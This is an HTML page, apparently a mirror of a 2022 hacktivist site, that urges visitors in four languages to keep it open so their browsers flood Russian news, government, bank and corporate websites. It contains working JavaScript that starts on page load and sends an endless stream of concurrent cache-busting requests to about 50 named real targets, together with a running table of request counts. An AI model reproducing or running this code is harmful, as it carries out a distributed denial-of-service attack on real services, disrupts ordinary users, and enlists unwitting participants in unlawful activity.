<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style></style>
  
  <title>russia MUST BE STOPPED!</title>
</head>
<body data-new-gr-c-s-check-loaded="14.1050.0" data-gr-ext-installed="">
  <h1>Morror strony z: <a href="https://stop-russian-desinformation.near.page" blank="_blank">https://stop-russian-desinformation.near.page</A></h1>
  <h1>Russia MUST BE STOPPED! Help Ukraine WIN!</h1>
  <table width="100%">
    <tbody><tr>
      <td width="23%">
        <h3>Wersja polska</h3>
        <p>Oficjalne wiadomości w Federacji Rosyjskiej są w większości fałszywe i uważamy, że lepiej jest je zamknąć i pozwolić ludziom przejść na wiarygodne źródła informacji.</p>
        <p>Prosimy, po prostu otwórzcie tę stronę i pozwólcie jej być otwartej na Waszych urządzeniach. Spowoduje to zalanie rosyjskich stron propagandowych i ogromne obciążenie ich infrastruktury.</p>
        <p>Twoja przeglądarka będzie działać wolno. Nie martwcie się i nie przerywajcie działania.</p>
        <p>Mały wkład każdego z nas może uratować Ukrainę 🙏</p>
      </td>
      <td width="23%">
        <h3>English version</h3>
        <p>The "official" news in the Russian Federation is mostly fake and we believe it is
            better to shut them down and let people switch to trustful news.</p>
        <p>Please, just open this page and let it be open on your devices. It will flood the
            Russian propaganda websites and pose a huge load on their infrastructure.</p>
        <p>Your browser will be slow. It's ok, don't worry and keep it run.</p>
        <p>A small contribution from each of us will save Ukraine 🙏</p>
      </td>
      <td width="23%">
        <h3>Русская версия</h3>
        <p>«Официальные» новости в РФ полны пропаганды и транслируют лживую информацию о
            событиях на Украине. Мы считаем, что лучше их закрыть и позволить людям
            переключиться на достоверные новости.</p>
        <p>Пожалуйста, откройте эту страницу на ваших устройствах. Это зальёт российские
            пропагандистские сайты запросами и создаст огромную нагрузку на их
            инфраструктуру.</p>
        <p>Ваш браузер будет работать медленно. Все в порядке, не волнуйтесь и держите его
            открытым.</p>
        <p>Небольшой вклад каждого из нас спасет Украину 🙏</p>
      </td>
      <td width="23%">
        <h3>Українська версія</h3>
        <p>«Офіційні» новини в РФ сповнені пропаганди та транслюють брехливу інформацію про
            події в Україні. Ми вважаємо, що краще їх закрити та дозволити людям переключитися
            на достовірні новини.</p>
        <p>Будь ласка, відкрийте цю сторінку на вашому пристрої. Це закидає російські
            пропагандистські сайти запитами та створить величезне навантаження на їхню
            інфраструктуру.</p>
        <p>Ваш браузер працюватиме повільно. Все гаразд, не хвилюйтеся та тримайте його
            відкритим.</p>
        <p>Невеликий внесок кожного з нас врятує Україну 🙏</p>
      </td>
    </tr>
   </tbody></table>
   <div id="stats"><table width="100%"><thead><tr><th>URL</th><th>Number of Requests</th><th>Number of Errors</th></tr></thead><tbody><tr><td>https://lenta.ru/</td><td>2714</td><td>41</td></tr><tr><td>https://ria.ru/</td><td>1652</td><td>42</td></tr><tr><td>https://ria.ru/lenta/</td><td>1650</td><td>42</td></tr><tr><td>https://www.rbc.ru/</td><td>1676</td><td>43</td></tr><tr><td>https://www.rt.com/</td><td>1665</td><td>44</td></tr><tr><td>http://kremlin.ru/</td><td>1729</td><td>1729</td></tr><tr><td>http://en.kremlin.ru/</td><td>1688</td><td>1688</td></tr><tr><td>https://smotrim.ru/</td><td>1676</td><td>41</td></tr><tr><td>https://tass.ru/</td><td>1731</td><td>41</td></tr><tr><td>https://tvzvezda.ru/</td><td>1690</td><td>42</td></tr><tr><td>https://vsoloviev.ru/</td><td>1685</td><td>43</td></tr><tr><td>https://www.1tv.ru/</td><td>1721</td><td>47</td></tr><tr><td>https://www.vesti.ru/</td><td>1829</td><td>86</td></tr><tr><td>https://online.sberbank.ru/</td><td>1678</td><td>42</td></tr><tr><td>https://sberbank.ru/</td><td>1681</td><td>43</td></tr><tr><td>https://zakupki.gov.ru/</td><td>1668</td><td>44</td></tr><tr><td>https://www.gosuslugi.ru/</td><td>1673</td><td>114</td></tr><tr><td>https://er.ru/</td><td>1692</td><td>58</td></tr><tr><td>https://www.rzd.ru/</td><td>1665</td><td>41</td></tr><tr><td>https://rzdlog.ru/</td><td>1658</td><td>42</td></tr><tr><td>https://vgtrk.ru/</td><td>1677</td><td>43</td></tr><tr><td>https://www.interfax.ru/</td><td>2489</td><td>58</td></tr><tr><td>https://www.mos.ru/uslugi/</td><td>1695</td><td>43</td></tr><tr><td>http://government.ru/</td><td>1756</td><td>1756</td></tr><tr><td>https://mil.ru/</td><td>1890</td><td>41</td></tr><tr><td>https://www.nalog.gov.ru/</td><td>1680</td><td>43</td></tr><tr><td>https://customs.gov.ru/</td><td>1716</td><td>52</td></tr><tr><td>https://pfr.gov.ru/</td><td>1775</td><td>44</td></tr><tr><td>https://rkn.gov.ru/</td><td>1714</td><td>51</td></tr><tr><td>https://www.gazprombank.ru/</td><td>3304</td><td>84</td></tr><tr><td>https://www.vtb.ru/</td><td>1675</td><td>41</td></tr><tr><td>https://www.gazprom.ru/</td><td>1713</td><td>43</td></tr><tr><td>https://lukoil.ru</td><td>1703</td><td>42</td></tr><tr><td>https://magnit.ru/</td><td>2159</td><td>46</td></tr><tr><td>https://www.nornickel.com/</td><td>1688</td><td>37</td></tr><tr><td>https://www.surgutneftegas.ru/</td><td>1703</td><td>39</td></tr><tr><td>https://www.tatneft.ru/</td><td>1710</td><td>40</td></tr><tr><td>https://www.evraz.com/ru/</td><td>1668</td><td>41</td></tr><tr><td>https://nlmk.com/</td><td>1676</td><td>39</td></tr><tr><td>https://www.sibur.ru/</td><td>1680</td><td>42</td></tr><tr><td>https://www.severstal.com/</td><td>1655</td><td>43</td></tr><tr><td>https://www.metalloinvest.com/</td><td>1721</td><td>41</td></tr><tr><td>https://nangs.org/</td><td>1690</td><td>47</td></tr><tr><td>https://rmk-group.ru/ru/</td><td>1700</td><td>41</td></tr><tr><td>https://www.tmk-group.ru/</td><td>1672</td><td>40</td></tr><tr><td>https://ya.ru/</td><td>1733</td><td>47</td></tr><tr><td>https://www.polymetalinternational.com/ru/</td><td>1692</td><td>44</td></tr><tr><td>https://www.uralkali.com/ru/</td><td>1694</td><td>43</td></tr><tr><td>https://www.eurosib.ru/</td><td>1694</td><td>113</td></tr><tr><td>https://ugmk.ua/</td><td>1937</td><td>44</td></tr><tr><td>https://omk.ru/</td><td>1821</td><td>41</td></tr></tbody></table></div>

<script>
var targets = {
  'https://lenta.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://ria.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://ria.ru/lenta/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.rbc.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.rt.com/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'http://kremlin.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'http://en.kremlin.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://smotrim.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://tass.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://tvzvezda.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://vsoloviev.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.1tv.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.vesti.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://online.sberbank.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://sberbank.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://zakupki.gov.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.gosuslugi.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://er.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.rzd.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://rzdlog.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://vgtrk.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.interfax.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.mos.ru/uslugi/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'http://government.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://mil.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.nalog.gov.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://customs.gov.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://pfr.gov.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://rkn.gov.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.gazprombank.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.vtb.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.gazprom.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://lukoil.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://magnit.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.nornickel.com/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.surgutneftegas.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.tatneft.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.evraz.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://nlmk.com/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.sibur.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.severstal.com/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.metalloinvest.com/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://nangs.org/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://rmk-group.ru/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.tmk-group.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://ya.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.polymetalinternational.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.uralkali.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.eurosib.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://ugmk.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
  'https://omk.ru/': { number_of_requests: 0, number_of_errored_responses: 0 }, 
}

var PRINT_INTERVAL = 1000;
var CONCURRENCY_LIMIT = 1000
var queue = []

var statsEl = document.getElementById('stats');
function printStats() {
  statsEl.innerHTML = '<table width="100%"><thead><tr><th>URL</th><th>Number of Requests</th><th>Number of Errors</th></tr></thead><tbody>' + Object.entries(targets).map(([target, { number_of_requests, number_of_errored_responses  }]) => '<tr><td>' + target + '</td><td>' + number_of_requests + '</td><td>' + number_of_errored_responses + '</td></tr>').join('') + '</tbody></table>'
}
setInterval(printStats, PRINT_INTERVAL);



async function fetchWithTimeout(resource, options) {
  const controller = new AbortController();
  const id = setTimeout(() => controller.abort(), options.timeout);
  return fetch(resource, {
    method: 'GET',
    mode: 'no-cors',
    signal: controller.signal
  }).then((response) => {
    clearTimeout(id);
    return response;
  }).catch((error) => {
    clearTimeout(id);
    throw error;
  });
}

async function flood(target) {
  for (var i = 0;; ++i) {
    if (queue.length > CONCURRENCY_LIMIT) {
      await queue.shift()
    }
    rand = i % 3 === 0 ? '' : ('?' + Math.random() * 1000)
    queue.push(
      fetchWithTimeout(target+rand, { timeout: 1000 })
        .catch((error) => {
          if (error.code === 20 /* ABORT */) {
            return;
          }
          targets[target].number_of_errored_responses++;
        })
        .then((response) => {
          if (response && !response.ok) {
            targets[target].number_of_errored_responses++;
          }
          targets[target].number_of_requests++;
        })

    )
  }
}

// Start
Object.keys(targets).map(flood)
</script>